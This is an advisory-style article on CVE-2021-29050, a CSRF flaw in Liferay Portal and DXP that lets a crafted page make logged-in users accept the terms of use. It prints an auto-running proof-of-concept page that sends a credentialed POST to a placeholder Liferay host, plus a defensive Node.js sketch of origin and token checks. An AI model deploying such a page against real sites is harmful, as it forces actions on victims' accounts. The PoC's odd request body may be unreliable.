CVE-2021-29050: Uncovering a CSRF Vulnerability in Liferay Portal and Liferay DXP
CVE-2021-29050 is a Cross-Site Request Forgery (CSRF) vulnerability that affects the terms of use page in Liferay Portal and Liferay DXP. It allows remote attackers to make users accept the site's terms of use without intending to, by using social engineering to lure them to a malicious page. This article covers the details of the exploit, including a code snippet and links to original references for further investigation.
Background on Liferay Portal and Liferay DXP
Liferay Portal is an open-source enterprise portal platform used for creating web applications, websites, and intranets. Liferay DXP (Digital Experience Platform) is a more advanced version of the Liferay Portal, offering enhanced security and performance features. Both Liferay Portal and Liferay DXP are widely used by businesses to create and manage their digital presence.
Vulnerability Details
The CSRF vulnerability affects Liferay Portal versions before 7.3.6, Liferay DXP 7.3 before service pack 1, and Liferay DXP 7.2 before fix pack 11. A remote attacker can craft a webpage that, when visited by a user with an active session on the vulnerable Liferay installation, triggers an unwanted action: in this case, accepting the site's terms of use.
Such an action may seem harmless initially, but it can lead to potential malicious activities, such as unauthorized access to sensitive information or manipulation of users' data.
Code Snippet
Here is an example of a malicious page that exploits the CSRF vulnerability. It relies on the user's existing session so that the terms of use are accepted without the user knowing.
<!DOCTYPE html>
<html>
  <head>
    <title>Malicious Page</title>
    <script>
      // Runs as soon as the page loads; no click by the visitor is needed.
      function exploit() {
        const xhr = new XMLHttpRequest();
        xhr.open(
          "POST",
          "https://vulnerable.liferay.site.com/c/portal/update_terms_of_use",
          true
        );
        // A form-encoded POST is a "simple" request, so no CORS preflight is sent.
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        // Attach the visitor's session cookies for the target site.
        xhr.withCredentials = true;
        xhr.send("cmd=update/tos=accepted");
      }
    </script>
  </head>
  <body onload="exploit()">
    <h1>Nothing to see here...</h1>
  </body>
</html>
When an unsuspecting user visits the malicious page, the exploit function is triggered, and it sends a POST request to the vulnerable Liferay installation to accept the terms of use.
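The request above succeeds because the session cookie is the only thing the server checks. The following added example (not Liferay's code or its actual fix) sketches the two server-side checks from the OWASP cheat sheet, source-origin verification and a per-session token, and runs them against a request shaped like the one the snippet sends; the trusted origin, secret, `csrfToken` field and sample requests are constructed assumptions.

```javascript
// Added example, not Liferay code. Origins, secret and token field are constructed.
const crypto = require("crypto");

const TRUSTED_ORIGINS = new Set(["https://portal.example.test"]); // assumed portal origin
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

// Per-session token derived with HMAC, so no server-side token store is needed.
function issueToken(secret, sessionId) {
  return crypto.createHmac("sha256", secret).update(sessionId).digest("hex");
}

// Constant-time comparison; a length mismatch is rejected before comparing.
function tokensMatch(a, b) {
  const x = Buffer.from(String(a || ""));
  const y = Buffer.from(String(b || ""));
  return x.length === y.length && crypto.timingSafeEqual(x, y);
}

// req: { method, headers, sessionId, body } with lower-case header names.
function checkCsrf(req, secret) {
  if (SAFE_METHODS.has(req.method)) return { allow: true, reason: "safe method" };
  // 1. Source origin: prefer Origin, fall back to the origin part of Referer.
  let source = req.headers.origin;
  if (!source && req.headers.referer) {
    try { source = new URL(req.headers.referer).origin; } catch { source = "invalid"; }
  }
  if (source && !TRUSTED_ORIGINS.has(source)) {
    return { allow: false, reason: "cross-origin source: " + source };
  }
  // 2. Token: required even when no origin header arrived; the cookie alone proves nothing.
  const sent = new URLSearchParams(req.body || "").get("csrfToken");
  if (!tokensMatch(sent, issueToken(secret, req.sessionId))) {
    return { allow: false, reason: "missing or invalid token" };
  }
  return { allow: true, reason: "origin and token verified" };
}

// Constructed sample requests; the session id stands for the victim's valid cookie.
const SECRET = "constructed-demo-secret";
const forged = { method: "POST", sessionId: "sess-1",
  headers: { origin: "https://other-site.example.test" },
  body: "cmd=update/tos=accepted" }; // body as sent by the page's snippet
const stripped = { ...forged, headers: {} }; // same request with Origin/Referer removed
const genuine = { method: "POST", sessionId: "sess-1",
  headers: { origin: "https://portal.example.test" },
  body: "cmd=update&csrfToken=" + issueToken(SECRET, "sess-1") };

for (const r of [forged, stripped, genuine]) console.log(checkCsrf(r, SECRET));
```

The forged request is rejected on its origin, the header-stripped variant is rejected for lacking a token, and only the same-origin request carrying the session's token is allowed.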
Original References and Links
The details of CVE-2021-29050 were initially published by the National Vulnerability Database (NVD) at the following link: https://nvd.nist.gov/vuln/detail/CVE-2021-29050
For a comprehensive reference on Liferay Portal and Liferay DXP version history and associated vulnerabilities, visit Liferay's official Security Vulnerabilities page: https://liferay.dev/known-vulnerabilities
For more information on Cross-Site Request Forgery (CSRF) and how it works, visit the OWASP CSRF Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
Conclusion
The CVE-2021-29050 CSRF vulnerability in Liferay Portal and Liferay DXP underscores the importance of staying vigilant against seemingly innocuous vulnerabilities and updating software to the latest versions promptly. Organizations using Liferay Portal and Liferay DXP should apply the appropriate patches, fix packs, or service packs as soon as possible to ensure their digital presence remains secure.
Timeline
Published on: 02/20/2024 22:15:08 UTC
Last modified on: 08/01/2024 13:42:11 UTC